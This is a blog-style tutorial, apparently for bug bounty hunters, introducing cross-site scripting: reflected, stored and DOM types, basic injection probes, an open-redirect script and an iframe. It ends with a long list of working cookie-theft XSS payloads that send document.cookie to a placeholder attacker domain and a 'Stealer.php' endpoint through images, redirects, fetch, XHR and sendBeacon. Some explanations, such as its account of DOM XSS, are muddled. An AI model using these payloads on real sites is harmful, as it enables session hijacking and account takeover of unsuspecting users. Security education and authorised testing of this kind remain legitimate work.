AlbusSec:- Penetration-List 05 Cross-Site-Scripting (XSS) — Part 1

Hello Members, I hope that you liked the previous article that is File-Inclusion. Therefore, I worked hard to complete Penetration-list Project as soon as possible. Firstly, I will introduce myself. So, I’m Aniket Tyagi and I’m an Information Technology officer at the 5f eco foundation of India, Information Security Researcher, and founder of Albus Security. However, Today We’ll learn about Cross-site-Scripting(XSS) Vulnerability which is a very contentious Vulnerability , because all bug bounty hunters firstly go for this but WAf Refused to execute this, however, we will learn lots of things about Cross-Site-Scripting(XSS) Vulnerability. Without Wasting Your chakra, let’s get started.

Cross-Site-Scripting(XSS):-

Cross-Site-Scripting(XSS) Vulnerability is a Client-Side-Injection, In which the attacker manipulates the vulnerable website by injecting malicious scripts into a vulnerable web page. Basically, the attacker firstly finds an input where he injects malicious script then the attacker sees where the input is reflected in the web page, Whenever the attacker sees that the input is reflected on a web page, then he’ll inject malicious script So that malicious script can steal victim cookies, session tokens, or other sensitive information retained by the browser, Then malicious scripts also can even rewrite the content of the HTML page with the help iframe just like ClickHijacking.

  • Basic Technique for XSS
  • Types of Cross-Site-Scripting
  • Impact of Cross-Site-Scripting
  • Stored And Reflected Cross-Site-Scripting
  • Document object model( DOM) Cross-Site-Scripting
  • WAF Bypassing Technique

Basic Technique For XSS:-

The attacker first finds param to inject malicious script some time attacker also inject a malicious script into the header( host: albussecurity.com “”/><img src=x onerror=alert()>) , path ( albussecurity.com/index.html?=alert() ), Cookie ( user_id=122"<script>prompt()</script>. then check which value was reflected on a web page. Second, an attacker can find the context where it’s reflected into the web page ( <h1>searched for: hello</h2> ) So, Whenever you see that your entered input was reflected into a web page. then go for the Third step which is injecting malicious script into a vulnerable website. Some Web applications execute the malicious script inside context but In the real world it’s impossible So You’ll need to exit from context, Then Create new events/attributes to execute the malicious script ( </h2><script>alert()</script>, Also, Web applications use dom to maintain user input then you can also use dom XSS, But You need to pay attention how your input is controlled.

To Get Basic-Cross-Site-Scripting Payload list Please check our Penetration-List:- {Coming-Soon}

Types of Cross-Site-Scripting:-

Whenever You’ll see that your value is reflected on a web page, then you’ll need to find how the server will treat your input.

Same-Time reflected XSS:- also known as reflected XSS or Non-Persistent XSS Vulnerability, In which whenever attacker injects malicious script into a web page Overall, A Malicious HTTP Requests was sent to an application, On same-time Server will give a response in which a malicious javascript payload was executed.

Stored-Cross-Site-Scripting(XSS):- also known as persistent XSS, In which whenever attacker injects malicious script into a web page Mean a malicious HTTP Request was sent to an application, And Server will store that malicious request in which there was a malicious js script injected by the attacker. Whenever You’ll visit that malicious web page that was stored by the server then it will execute a malicious script.
Stored XSS Vulnerability is those where the injected script is permanently stored on the target servers, such as in a Profile Image, message forum, visitor log, comment field, etc.

DOM-Cross-Site-Scripting (XSS):- In which whenever an attacker injects XSS Payload into Vulnerable applications through params, headers, etc then server stores that payload in their js(document object model (DOM)) file, Whenever user visit that page. Therefore, a Malicious script was triggered inside a user’s browser instead of the site server.

Impact Of Cross-Site-Scripting:-

Whenever You’ll find XSS on applications, Then Your mind gives a question that how We’ll exploit this, So Cross-Site-Scripting(XSS) gives us many ways to exploit this:-

  • Open-Redirection through XSS:-

Whenever an attacker successfully executes an alert box, Whenever you report about this, you got always p3 but if you bind with any other vulnerability like Open-Redirection then it becomes p2 or sometimes p1 vulnerability. However, You can use this basic payload for this:-

<script>document.location.href=”https://domain-name"</script>

You can also use some different attributes/events/tags in your payload.

To Get Open-redirection-through-Cross-Site-Scripting Payload list Please check our Penetration-List:- {Coming-Soon}

  • Impersonate or masquerade as the victim user:-

Same as Clickhijacking Vulnerability, to exploit this the basic payload is:-

<iframe src=”https://domain-name” height=”400" width=”400"></iframe>

  • Cookie Capturing:-

Whenever attackers exploit XSS within an application to inject a malicious script into the web page. If the server doesn’t set the HTTP Only in session cookies then, whenever the user visits that page injected malicious script was executed that can be gain access to your cookies, by sending that cookie to the attacker domain. If You are able to gain cookies then it becomes a p1 vulnerability, Here is the command payload for cookie hijacking.

<img src=x onerror=this.src="DOMAIN-NAME/?c="+document.cookie><img src=x onerror="location.href='DOMAIN-NAME/?c='+ document.cookie"><script>new Image().src="DOMAIN-NAME/?c="+encodeURI(document.cookie);</script><script>new Audio().src="DOMAIN-NAME/?c="+escape(document.cookie);</script><script>location.href = 'DOMAIN-NAME/Stealer.php?cookie='+document.cookie</script><script>location = 'DOMAIN-NAME/Stealer.php?cookie='+document.cookie</script><script>document.location = 'DOMAIN-NAME/Stealer.php?cookie='+document.cookie</script><script>document.location.href = 'DOMAIN-NAME/Stealer.php?cookie='+document.cookie</script><script>document.write('<img src="DOMAIN-NAME?c='+document.cookie+'" />')</script><script>window.location.assign('DOMAIN-NAME/Stealer.php?cookie='+document.cookie)</script><script>window['location']['assign']('DOMAIN-NAME/Stealer.php?cookie='+document.cookie)</script><script>window['location']['href']('DOMAIN-NAME/Stealer.php?cookie='+document.cookie)</script><script>document.location=["DOMAIN-NAME?c",document.cookie].join()</script><script>var i=new Image();i.src="DOMAIN-NAME/?c="+document.cookie</script><script>window.location="DOMAIN-NAME/?c=".concat(document.cookie)</script><script>var xhttp=new XMLHttpRequest();xhttp.open("GET", "DOMAIN-NAME/?c="%2Bdocument.cookie, true);xhttp.send();</script><script>fetch('DOMAIN-NAME', {method: 'POST', mode: 'no-cors', body:document.cookie});</script><script>navigator.sendBeacon('DOMAIN-NAME/x/AAAAA',document.cookie)</script>

You can also use some different attributes/events/tags in your payload Also.

Now I will stop my hands to continue on this but we will learn more in the next article. In that article, We’ll learn Reflected, Stored, and Dom XSS deeply in our next article “Penetration-List 05 Cross-Site-Scripting (XSS) Part 02”, Thank You For Reading.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store